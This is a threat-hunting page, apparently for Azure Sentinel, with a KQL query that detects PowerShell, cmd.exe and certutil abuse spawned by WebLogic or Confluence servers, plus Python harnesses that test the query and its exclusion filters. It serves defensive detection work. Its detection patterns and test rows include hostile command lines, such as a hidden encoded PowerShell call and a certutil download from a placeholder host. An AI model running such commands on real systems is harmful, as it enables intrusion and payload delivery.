Adversaries may be leveraging compromised Confluence Server instances, or WebLogic vulnerabilities, to exfiltrate data or establish persistence. SOC teams should proactively hunt for this behavior in Azure Sentinel to detect and mitigate targeted attacks against critical infrastructure.
KQL Query
```kusto
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where
    // "Grandparent" process is Oracle WebLogic or some process loading Confluence
    InitiatingProcessParentFileName == "beasvc.exe"
    or InitiatingProcessFileName == "beasvc.exe"
    or InitiatingProcessCommandLine contains "//confluence"
// Calculate for Base64 in Commandline
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
         Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total)
| where
    (
        FileName in~ ("powershell.exe", "powershell_ise.exe") // PowerShell is spawned
        // Omit known clean processes
        and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
        and ProcessCommandLine !contains "ApplicationNo"
        and ProcessCommandLine !contains "CustomerGroup"
        and ProcessCommandLine !contains "Cosmos"
        and ProcessCommandLine !contains "Unrestricted"
        and
        (
            ProcessCommandLine contains "$" // PowerShell variable declaration
            or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
            or ProcessCommandLine contains "encodedcommand"
            or ProcessCommandLine contains "wget"
            //or (Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
        )
    )
    or
    (
        FileName =~ "cmd.exe" // cmd.exe is spawned
        and ProcessCommandLine contains "@echo"
        and ProcessCommandLine contains ">" // Echoing commands into a file
    )
    or
    (
        FileName =~ "certutil.exe" // CertUtil.exe abuse
        and ProcessCommandLine contains "-split" // the "-split" parameter is required to write files to the disk
    )
| project
    Timestamp,
    InitiatingProcessCreationTime,
    DeviceId,
    Grandparent_PID = InitiatingProcessParentId,
    Grandparent = InitiatingProcessParentFileName,
    Parent_Account = InitiatingProcessAccountName,
    Parent_PID = InitiatingProcessId,
    Parent = InitiatingProcessFileName,
    Parent_Commandline = InitiatingProcessCommandLine,
    Child_PID = ProcessId,
    Child = FileName,
    Child_Commandline = ProcessCommandLine
```
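To check the query's logic before scheduling it, the predicates can be re-implemented and run over a handful of constructed DeviceProcessEvents rows. The following is an added example, not part of the original hunting query or the Sentinel repository; it mirrors each KQL operator (`==` case-sensitive, `contains`/`!startswith`/`in~`/`=~` case-insensitive), reproduces the Ratio column, and uses constructed sample rows whose device ids, paths, host name and encoded blob are placeholders.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """The DeviceProcessEvents columns the query reads; names match the KQL columns."""
    DeviceId: str
    InitiatingProcessParentFileName: str  # "grandparent"
    InitiatingProcessFileName: str        # "parent"
    InitiatingProcessCommandLine: str
    FileName: str                         # "child"
    ProcessCommandLine: str

# Known-clean markers copied from the query's PowerShell branch.
KNOWN_CLEAN_PREFIX = 'POWERSHELL.EXE -C "GET-WMIOBJECT -COMPUTERNAME'
KNOWN_CLEAN_SUBSTRINGS = ("ApplicationNo", "CustomerGroup", "Cosmos", "Unrestricted")

def contains(haystack: str, needle: str) -> bool:
    """KQL `contains` / `!contains` are case-insensitive substring tests."""
    return needle.lower() in haystack.lower()

def caps_ratio(cmdline: str) -> float:
    """The query's Ratio column: upper-case letters over all characters.
    countof(x, ".", "regex") counts every character, so an empty command line
    divides by zero (NaN in Kusto); 0.0 is returned here instead."""
    if not cmdline:
        return 0.0
    return len(re.findall(r"[A-Z]", cmdline)) / len(cmdline)

def from_weblogic_or_confluence(ev: ProcessEvent) -> bool:
    """First `where`: grandparent or parent is beasvc.exe (KQL `==` is case-sensitive),
    or the parent command line references //confluence."""
    return (ev.InitiatingProcessParentFileName == "beasvc.exe"
            or ev.InitiatingProcessFileName == "beasvc.exe"
            or contains(ev.InitiatingProcessCommandLine, "//confluence"))

def suspicious_powershell(ev: ProcessEvent) -> bool:
    """PowerShell child, minus the known-clean patterns, with a variable, encoded command or wget."""
    if ev.FileName.lower() not in ("powershell.exe", "powershell_ise.exe"):  # in~
        return False
    cl = ev.ProcessCommandLine
    if cl.lower().startswith(KNOWN_CLEAN_PREFIX.lower()):  # !startswith is case-insensitive
        return False
    if any(contains(cl, s) for s in KNOWN_CLEAN_SUBSTRINGS):
        return False
    return any(contains(cl, s) for s in ("$", "-e ", "encodedcommand", "wget"))

def suspicious_cmd(ev: ProcessEvent) -> bool:
    """cmd.exe echoing commands into a file."""
    return (ev.FileName.lower() == "cmd.exe"  # =~
            and contains(ev.ProcessCommandLine, "@echo")
            and ">" in ev.ProcessCommandLine)

def suspicious_certutil(ev: ProcessEvent) -> bool:
    """certutil.exe with -split, which is what lets it write a file to disk."""
    return ev.FileName.lower() == "certutil.exe" and contains(ev.ProcessCommandLine, "-split")

def hunt(events):
    """Apply both `where` stages and return the query's projection (plus Ratio)."""
    hits = []
    for ev in events:
        if from_weblogic_or_confluence(ev) and (
                suspicious_powershell(ev) or suspicious_cmd(ev) or suspicious_certutil(ev)):
            hits.append({
                "DeviceId": ev.DeviceId,
                "Grandparent": ev.InitiatingProcessParentFileName,
                "Parent": ev.InitiatingProcessFileName,
                "Parent_Commandline": ev.InitiatingProcessCommandLine,
                "Child": ev.FileName,
                "Child_Commandline": ev.ProcessCommandLine,
                "Ratio": round(caps_ratio(ev.ProcessCommandLine), 3),
            })
    return hits

# Constructed sample rows; device ids, paths, host name and the encoded blob are placeholders.
SAMPLE_EVENTS = [
    # WebLogic (beasvc.exe) -> java.exe -> PowerShell with an encoded command: hit
    ProcessEvent("dev-01", "beasvc.exe", "java.exe", "java -jar weblogic.jar",
                 "powershell.exe", "powershell.exe -nop -w hidden -e QQBCAEMA"),
    # Confluence Tomcat service -> certutil -split: hit via the //confluence clause
    ProcessEvent("dev-02", "services.exe", "tomcat9.exe", r"C:\Confluence\bin\tomcat9.exe //RS//Confluence",
                 "certutil.exe", "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"),
    # WebLogic-spawned PowerShell matching the known-clean prefix: suppressed despite the "$"
    ProcessEvent("dev-03", "beasvc.exe", "java.exe", "java -jar weblogic.jar",
                 "POWERSHELL.EXE", 'POWERSHELL.EXE -C "GET-WMIOBJECT -COMPUTERNAME $env:COMPUTERNAME"'),
    # Same encoded-command pattern but launched from Explorer: outside the query's scope
    ProcessEvent("dev-04", "explorer.exe", "cmd.exe", "cmd.exe",
                 "powershell.exe", "powershell.exe -e QQBCAEMA"),
    # WebLogic -> cmd.exe writing a batch file through @echo redirection: hit
    ProcessEvent("dev-05", "beasvc.exe", "java.exe", "java -jar weblogic.jar",
                 "cmd.exe", r"cmd.exe /c @echo dir > C:\Windows\Temp\t.bat"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Rows dev-01, dev-02 and dev-05 are returned; dev-03 shows the known-clean prefix suppressing a command line that would otherwise match on `$`, and dev-04 shows that the first `where` scopes the whole query to WebLogic- or Confluence-descended processes, so the same PowerShell pattern from another parent is never evaluated.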
```yaml
id: 8b8be25f-1bc0-4d57-81a7-76ef97f1d64f
name: confluence-weblogic-targeted
description: |
  This query was originally published in the threat analytics report, Confluence and WebLogic abuse.
  2019 has seen several seemingly related campaigns targeting Atlassian Confluence Server and Oracle WebLogic Server. Although these campaigns use different implants and delivery methods, they consistently use the same infrastructure, and exploit the same vulnerabilities.
  The campaigns have specifically targeted:
  1. CVE-2019-3396 - Software update
  2. CVE-2019-2725 - Software update
  The following query detects activity broadly associated with these campaigns.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
tactics:
  - Vulnerability
query: |
  DeviceProcessEvents
  | where Timestamp >= ago(7d)
  | where
      // "Grandparent" process is Oracle WebLogic or some process loading Confluence
      InitiatingProcessParentFileName == "beasvc.exe"
      or InitiatingProcessFileName == "beasvc.exe"
      or InitiatingProcessCommandLine contains "//confluence"
  // Calculate for Base64 in Commandline
  | extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
           Total = countof(ProcessCommandLine, ".", "regex")
  | extend Ratio = todouble(Caps) / todouble(Total)
  | where
      (
          FileName in~ ("powershell.exe", "powershell_ise.exe") // PowerShell is spawned
          // Omit known clean processes
          and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
          and ProcessCommandLine !contains "ApplicationNo"
          and ProcessCommandLine !contains "CustomerGroup"
          and ProcessCommandLine !contains "Cosmos"
          and ProcessCommandLine !contains "Unrestricted"
          and
          (
              ProcessCommandLine contains "$" // PowerShell variable declaration
              or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
              or ProcessCommandLine contains "encodedcommand"
              or ProcessCommandLine contains "wget"
              //or (Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
          )
      )
      or
      (
          FileName =~ "cmd.exe" // cmd.exe is spawned
          and ProcessCommandLine contains "@echo"
          and ProcessCommandLine contains ">" // Echoing commands into a file
      )
      or
      (
          FileName =~ "certutil.exe" // CertUtil.exe abuse
          and ProcessCommandLine contains "-split" // the "-split" parameter is required to write files to the disk
      )
  | project
      Timestamp,
      InitiatingProcessCreationTime,
      DeviceId,
      Grandparent_PID = InitiatingProcessParentId,
      Grandparent = InitiatingProcessParentFileName,
      Parent_Account = InitiatingProcessAccountName,
      Parent_PID = InitiatingProcessId,
      Parent = InitiatingProcessFileName,
      Parent_Commandline = InitiatingProcessCommandLine,
      Child_PID = ProcessId,
      Child = FileName,
      Child_Commandline = ProcessCommandLine
```
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure this data connector is enabled |
Scenario: Scheduled Backup Job Execution
Description: A legitimate scheduled backup job runs on a Confluence instance, which may trigger the rule due to similar network activity or process execution patterns.
Filter/Exclusion: process.name:*backup* OR process.args:*backup* OR process.parent.name:confluence*
Scenario: Admin Task - Content Migration
Description: An administrator is performing a content migration between Confluence instances, which may involve similar HTTP requests or file transfers that match the rule’s logic.
Filter/Exclusion: process.name:confluence* AND (process.args:*migrate* OR process.args:*import*)
Scenario: WebLogic Server Maintenance Task
Description: A system administrator is performing routine maintenance on a WebLogic server, which may involve similar network traffic or command execution patterns.
Filter/Exclusion: process.name:java AND process.args:*WebLogic* AND process.args:*maintenance*
Scenario: Automated Report Generation via Confluence
Description: A scheduled report generation task in Confluence uses a third-party tool like Jenkins or Apache NiFi to pull data and generate reports, which could trigger the rule due to similar process or network behavior.
Filter/Exclusion: process.name:jenkins* OR process.name:apache-nifi* OR process.args:*report*
Scenario: Legitimate Use of Confluence API for Automation
Description: A DevOps team is using the Confluence REST API (e.g., via Postman, curl, or Python scripts) to automate documentation updates or task tracking, which may resemble malicious activity.
Filter/Exclusion: process.name:curl* OR process.name:python*
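The exclusion filters above are written in a `field:glob` syntax rather than in KQL, so before any of them is folded into the hunting query it is worth confirming which events each one would actually suppress. The following is an added example, not part of the original page: a small parser and evaluator for that syntax, run against constructed events keyed by DeviceProcessEvents column names. The mapping of `process.name`, `process.args` and `process.parent.name` onto `FileName`, `ProcessCommandLine` and `InitiatingProcessFileName` is an assumption, as are the evaluation rules (case-insensitive glob matching, AND binding tighter than OR, parentheses for grouping); the Content Migration filter is written with parentheses so the OR is scoped to the two args patterns.

```python
import fnmatch
import re

# Assumed mapping of the scenarios' field names onto the DeviceProcessEvents columns
# used by the hunting query.
FIELD_MAP = {
    "process.name": "FileName",
    "process.args": "ProcessCommandLine",
    "process.parent.name": "InitiatingProcessFileName",
}

# A filter is a sequence of `field:glob` terms joined by AND / OR, with optional parentheses.
TOKEN_RE = re.compile(r"[A-Za-z_.]+:[^\s()]+|AND|OR|\(|\)")

def tokenize(expr: str):
    return TOKEN_RE.findall(expr)

class Parser:
    """Recursive-descent parser; AND binds tighter than OR (assumed, as in Lucene syntax)."""
    def __init__(self, tokens):
        self.toks, self.i = tokens, 0
    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None
    def take(self):
        tok = self.peek()
        self.i += 1
        return tok
    def parse_or(self):
        node = self.parse_and()
        while self.peek() == "OR":
            self.take()
            node = ("or", node, self.parse_and())
        return node
    def parse_and(self):
        node = self.parse_atom()
        while self.peek() == "AND":
            self.take()
            node = ("and", node, self.parse_atom())
        return node
    def parse_atom(self):
        tok = self.take()
        if tok == "(":
            node = self.parse_or()
            if self.take() != ")":
                raise ValueError("unbalanced parentheses")
            return node
        if tok is None or ":" not in tok:
            raise ValueError(f"unexpected token {tok!r}")
        field, pattern = tok.split(":", 1)
        return ("term", field, pattern)

def parse_filter(expr: str):
    parser = Parser(tokenize(expr))
    node = parser.parse_or()
    if parser.peek() is not None:
        raise ValueError(f"trailing token {parser.peek()!r}")
    return node

def evaluate(node, event: dict) -> bool:
    """Evaluate a parsed filter against an event keyed by DeviceProcessEvents column names."""
    if node[0] == "term":
        _, field, pattern = node
        value = event.get(FIELD_MAP.get(field, field), "")
        return fnmatch.fnmatchcase(value.lower(), pattern.lower())  # case-insensitive glob
    _, left, right = node
    if node[0] == "and":
        return evaluate(left, event) and evaluate(right, event)
    return evaluate(left, event) or evaluate(right, event)

def is_excluded(event: dict, filters):
    """Name of the first scenario whose filter would suppress the event, or None."""
    for name, expr in filters:
        if evaluate(parse_filter(expr), event):
            return name
    return None

# Filters copied from the scenarios; the migration filter is parenthesised to scope its OR.
SCENARIO_FILTERS = [
    ("Scheduled Backup Job Execution",
     "process.name:*backup* OR process.args:*backup* OR process.parent.name:confluence*"),
    ("Admin Task - Content Migration",
     "process.name:confluence* AND (process.args:*migrate* OR process.args:*import*)"),
    ("WebLogic Server Maintenance Task",
     "process.name:java AND process.args:*WebLogic* AND process.args:*maintenance*"),
    ("Automated Report Generation via Confluence",
     "process.name:jenkins* OR process.name:apache-nifi* OR process.args:*report*"),
    ("Legitimate Use of Confluence API for Automation",
     "process.name:curl* OR process.name:python*"),
]

# Constructed events (the encoded blob is a placeholder).
SAMPLE = [
    {"FileName": "powershell.exe", "ProcessCommandLine": "powershell.exe -e QQBCAEMA",
     "InitiatingProcessFileName": "java.exe"},
    {"FileName": "java", "ProcessCommandLine": "java -cp WebLogic.jar run maintenance",
     "InitiatingProcessFileName": "beasvc.exe"},
    {"FileName": "confluence-cli.exe", "ProcessCommandLine": "confluence-cli.exe import space.zip",
     "InitiatingProcessFileName": "cmd.exe"},
    # `*report*` is broad: any command line that mentions a report is suppressed
    {"FileName": "powershell.exe", "ProcessCommandLine": "powershell.exe -File weekly_report.ps1",
     "InitiatingProcessFileName": "java.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE:
        print(ev["FileName"], "->", is_excluded(ev, SCENARIO_FILTERS))
```

The first event (an encoded PowerShell command) is suppressed by none of the filters, while the last one shows how a bare `*report*` on the command line would also suppress a PowerShell invocation from a WebLogic parent; running candidate exclusions through a harness like this before adding them to the rule makes that kind of over-reach visible.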